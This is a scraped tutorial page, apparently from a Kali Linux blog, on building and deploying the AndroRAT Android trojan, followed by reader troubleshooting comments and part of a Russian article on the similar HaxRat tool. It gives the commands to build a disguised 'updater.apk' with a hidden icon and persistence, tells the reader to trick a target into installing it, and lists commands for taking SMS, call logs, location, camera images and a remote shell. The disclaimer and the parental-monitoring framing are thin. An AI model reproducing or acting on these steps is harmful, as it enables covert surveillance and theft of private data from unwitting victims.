- How to Remotely Monitor any Android Device
- Features of AndroRAT
- Installing & Using AndroRAT on Kali Linux
- Some Extra Talks
- You may like these posts
- Comments
- Установка и использование HaxRat на Termux и Kali Linux
- Установка и использование HaxRat на Termux и Kali Linux
- Установка и использование HaxRat на Kali Linux
How to Remotely Monitor any Android Device
Android is the most popular mobile operating system in today’s world. In today’s article we are going to learn «how to monitor an Android device remotely ?» To do so we are going to use a malicious application using our Kali Linux.
Using this method parents can monitor their kids mobile devices, a company can monitor what employees doing on company provided devices. Basically, we can use this to monitor any Android device.
To do so we are going to use AndroRAT . The name says all about this, Andro for Android and RAT is Remote Access Tool/Trojan. AndroRAT is designed to give control of the Android system remotely and receive information from it. It is a client/server application developed in Java Android for the client side and the server side is written in Python.
AndroRAT will work on devices from Android 4.1 (Jellybean) to Android 9 (Oreo) (API 16 to API 28). This RAT also works on Android 10, but some of the interpreter commands will be unstable.
Features of AndroRAT
- Full persistence backdoor.
- Invisible icon after installation.
- Lightweight apk runs 24X7 in background.
- Uses very minimal resources, so can’t be suspected.
- Automatic start after reboot.
- Audio and take pictures from both camera.
- Browse call and SMS log.
- Get current location, SIM card details, IP, MAC address of the device.
Installing & Using AndroRAT on Kali Linux
First of all we need to install Python3 on our Kali Linux system. We can do it by using following command:
sudo apt install python3 python3-pip
In the following screenshot we can see the output of the above command:
Now we need to install and set up Java 8 (OpenJDK 8) on our system. We have shown this on a previous article.
Now we need to clone AndroRAT on our system from GitHub by using following command:
git clone https://github.com/karma9874/AndroRAT
We can see the result on the following screenshot:
Now we need to move to the AndroRAT directory by using cd command:
Then we need to install all the requirements for AndroRAT by using following command:
pip3 install -r requirements.txt
In the above screenshot we can see the installation process of requirements. After that we need to install ngrok and set ngrok authentication token on our system, we had set it on our previous article . We need to follow that article to set ngrok on our system.
Now we can build the malicious APK file (payload), to do so we need to run following command:
python3 androRAT.py --build --ngrok -p 8888 -o ~/Desktop/updater.apk
In the above command we can see that we had used the androRAT.py python script and build our payload using —build flag, then we use —ngrok option because we had set up ngrok on our system (it will be easier otherwise we can use our IP address with -i flag, using ngrok we can easily start the listener). If we want then we can set an icon for the app using —icon flag following by an icon file path on our system but this payload runs on background so we are skipping this. Then we set a port for this service then we set the output file name using -o flag. The following screenshot shows the output of the above command:
In the above screenshot we can see that AndroRAT is building and signing the apk file, also we can see the output file (updater.apk) is on our Desktop. After finishing the the building process it will start the listener automatically as we can see in the following screenshot:
In the above screenshot we can see that AndroRAT listener is started and waiting for connection. Now we can send our apk file to a Android device by social engineering techniques and convince our target user to install it. To show a demo we are going to install the payload on our own Android tablet. We can see that we got the connection in the following screenshot:
- deviceInfo —> returns basic info of the device
- camList —> returns cameraID
- takepic [cameraID] —> Takes picture from camera
- startVideo [cameraID] —> starts recording the video
- stopVideo —> stop recording the video & show video file
- startAudio —> starts recording the audio
- stopAudio —> stop recording the audio
- getSMS [inbox|sent] —> returns inbox sms or sent sms in a file
- getCallLogs —> returns call logs in a file
- shell —> starts a sh shell of the device
- vibrate [number_of_times] —> vibrate the device number of time
- getLocation —> return the current location of the device
- getIP —> returns the ip of the device
- getSimDetails —> returns the details of all sim of the device
- clear —> clears the screen
- getClipData —> show the current text on the clipboard
- getMACAddress —> returns the mac address of the device
- exit —> exit the interpreter
We can run the above commands to monitor the android device. For an example we run the getSMS inbox command to see the inbox of our target. The output shown in the following screenshot:
In the above screenshot we can see that the SMS of victim’s inbox saved on our highlighted directory.
Same way if we want to take a camera shot we need to run the camList command first then it will show the list of camera’s on that device. Then we can take a snap by using takepic command. Shown in the following screenshot:
We also can open the shell-prompt of target android device by using shell command. After getting the terminal of the target of the victim’s device we can control the device from our Kali Linux system.
Some Extra Talks
- We have used ngrok services, but ngrok services are not so much stable. If we need a stable connection we need to use our static public IP address and forward our using port.
- If the targeted device have battery saver mode on then our payload will not get reverse connection.
- If our target device have Android version 11 or above then some interpreter commands may not stable.
- We need some great social engineering techniques to make fool our target and install the payload and after installing must need to click on «Open«. After that the payload will be hidden.
Warning:- This article is written for experimental and educational purposes only. We tried this on our own devices to show the demonstrate. Hacking other’s devices without proper permissions is illegal and can be considered as criminal offense. We are not responsible if anyone did anything wrong. Do the things at your own risk.
This is how we can remotely control or monitor Android devices from our Kali Linux system. This method is shown for educational purposes, it also spread cybersecurity awareness that how they hack into our systems.
Love our articles? Make sure to follow us to get all our articles directly on notification. We are also available on Twitter and GitHub , we post article updates there. To join our KaliLinuxIn family, join our Telegram Group . We are trying to build a community for Linux and Cybersecurity. For anything we always happy to help everyone on the comment section . As we know our comment section is always open to everyone. We read each and every comment and we always reply .
You may like these posts
Comments
How can I reconnect with that device after closing terminal .
We suggest to make a persistence backdoor on the target Android device just after first connection. There are lots of articles on the internet to make this. Warning:- Please do such things on your own device. We don’t support any illegal works. Delete Comment
python3 androRAT.py —build —ngrok -p 8888 -o ~/Desktop/updater.apk
[ERROR] pyngrok not found
[INFO] Run pip3 install -r requirements.txt
this error shows up
how to solve this Post a Comment Delete Comment
You shows us the solution. You need to run command «pip3 install -r requirements.txt». If you already did this then run command «pip3 install pyngrok» Delete Comment
«python3 androRAT.py —build —ngrok -p 8888 -o ~/Desktop/updater.apk»
Still now working I whenever I put this above command It shows
[ERROR] pyngrok not found
and I also tried using this command «pip3 install pyngrok»
It shows this
«Requirement already satisfied: pyngrok in /usr/local/lib/python3.10/dist-packages (5.1.0)
Requirement already satisfied: PyYAML in /usr/lib/python3/dist-packages (from pyngrok) (5.4.1)
WARNING: Running pip as the ‘root’ user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv «
please guide me full solution
Delete Comment
Traceback (most recent call last):
File «/home/kali/seeker/seeker.py», line 339, in
clear()
File «/home/kali/seeker/seeker.py», line 319, in clear
with open(RESULT, ‘w+’):
PermissionError: [Errno 13] Permission denied: ‘/home/kali/seeker/logs/result.txt’ Post a Comment Delete Comment
python3 seeker.py when i use this command i see the error plz check and find my solution Post a Comment Delete Comment
how to get back to the interpreter after exiting from it.
while running this command again «python3 androRAT.py —shell -i 0.0.0.0 -p 4444»
Its showing this error «[Errno 98] Address already in use»
So how can we get back to the same device interpreter.
Post a Comment Delete Comment
pip3 install -r requirements.txt
Defaulting to user installation because normal site-packages is not writeable
how to fix this arror
Post a Comment Delete Comment
Traceback (most recent call last):
File «/home/kali/.local/lib/python3.10/site-packages/pyngrok/ngrok.py», line 440, in api_request
response = urlopen(request, data, timeout)
File «/usr/lib/python3.10/urllib/request.py», line 216, in urlopen
return opener.open(url, data, timeout)
File «/usr/lib/python3.10/urllib/request.py», line 525, in open
response = meth(req, response)
File «/usr/lib/python3.10/urllib/request.py», line 634, in http_response
response = self.parent.error(
File «/usr/lib/python3.10/urllib/request.py», line 563, in error
return self._call_chain(*args)
File «/usr/lib/python3.10/urllib/request.py», line 496, in _call_chain
result = func(*args)
File «/usr/lib/python3.10/urllib/request.py», line 643, in http_error_default
raise HTTPError(req.full_url, code, msg, hdrs, fp)
urllib.error.HTTPError: HTTP Error 502: Bad Gateway
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File «/home/kali/Desktop/AndroRAT/androRAT.py», line 48, in
tcp_tunnel = ngrok.connect(port, «tcp»)
File «/home/kali/.local/lib/python3.10/site-packages/pyngrok/ngrok.py», line 255, in connect
tunnel = NgrokTunnel(api_request(«<>/api/tunnels».format(api_url), method=»POST», data=options,
File «/home/kali/.local/lib/python3.10/site-packages/pyngrok/ngrok.py», line 461, in api_request
raise PyngrokNgrokHTTPError(«ngrok client exception, API returned <>: <>«.format(status_code, response_data),
pyngrok.exception.PyngrokNgrokHTTPError: ngrok client exception, API returned 502: >
bro plz help
how to fix this error Post a Comment Delete Comment
Установка и использование HaxRat на Termux и Kali Linux
HaxRat — это мощный инструмент для скрытого удаленного управления Android, проще говоря, это RAT для Android, работающий на NodeJS. В статье покажу, как установить и использовать HaxRat на Termux (Android) и Kali Linux.
Установка и использование HaxRat на Termux и Kali Linux
Ранее мы рассказывали про использование L3MON. HaxRat основан на L3MON, но имеет некоторые дополнительные функции, такие как: создание скриншотов, запись экрана, запись с передней и задней камеры.
Разработчик данного RAT (троян для удаленного доступа) — известный этичный хакер Hax4us.
Возможности HaxRat:
- Создание снимков экрана
- Запись действий пользователя
- Запись с фронтальной и задней камеры
- Блокировка устройства
- Данные о местоположении GPS.
- Запись микрофона
- Просмотр контактов.
- История и отправка СМС
- История звонков
- Просмотр установленных приложений
- Просмотр разрешений
- Просмотр буфера обмена
- Просмотр уведомлений в реальном времени
- Просмотр списка сетей Wi-Fi
- Удаленный доступ к файлам
- Встроенный билдер файла APK
Статья в образовательных целях и предназначается для пенстеров и этичных хакеров. При написании статьи использовались личные устройства автора. Использование подобных программ без письменного разрешения является преступлением. Ни редакция spy-soft.net, ни автор не несут ответственности за ваши действия.
Установка и использование HaxRat на Kali Linux
Процесс установки HaxRat на Kali Linux такой же, как и L3MON.
Запустите Kali Linux (см. Создание флешки Kali Linux) и откройте терминал.
Установите JRE на Kali Linux (более подробно см. в статье Установка Java 8 OpenJDK на Kali Linux):